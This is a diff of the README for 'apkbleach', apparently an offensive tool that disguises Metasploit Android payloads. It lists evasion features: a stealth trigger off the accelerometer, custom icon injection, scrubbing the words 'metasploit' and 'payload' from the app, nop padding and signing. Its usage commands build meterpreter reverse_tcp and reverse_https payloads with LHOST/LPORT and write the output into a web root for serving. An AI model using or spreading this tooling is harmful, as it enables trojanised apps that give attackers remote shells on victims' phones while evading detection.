blackhaker0802/apkbleach/README.md

 **Features:**

+1) User interface for deployment of payloads

-1) Line by line permissions editing.
+2) Line by line permissions editing.
 The software will go through each permission in the manifest and ask if you want to delete it.

-2) Stealth option.
+3) Stealth option.
 This executes the payload off the devices accelerometer instead of on open.
 This option also allows you to choose how many sessions you want spawned of exploit.

-3) Custom icon injection.
+4) Custom icon injection.
 This allows users to modify the app icon that appears on the home screen of a android device.
 You can choose from a icon apkbleach provides or you can supply your own.
 Apkbleach will do all the work for you.

-4) Renames the application to the name you put chose as the ouput file
+5) Renames the application to the name you put chose as the ouput file

-5) Scrubs the entire application of any mentions of the name "metasploit" , "stage" or "payload".
+6) Scrubs the entire application of any mentions of the name "metasploit" , "stage" or "payload".
 There are a lot by the way. sending security testing with an app that contains the name metasploit is just funny :-)

-6) Adds padnops to PAYLOAD
+7) Adds padnops to PAYLOAD

-7) Signs apk with jarsigner. msfenom produces unsigned apps
+8) Signs apk with jarsigner. msfenom produces unsigned apps

-8) Zip aligns apk
+9) Zip aligns apk

-9) Apktool upgrade feature.
+10) Apktool upgrade feature.
 If the software detects youre using apktool version 2.4.1-dirty which is Kali's package maintainers version it will ask if you want to replace it with the lates version frfom ibot peaches.
 This is a good idea because it conflicts with the msfvenom -x option and throws a version number error.
 Not to mention the problems it has given users in the past.

 **Usage:**

     apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk

+    apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all

      apkbleach --list-payloads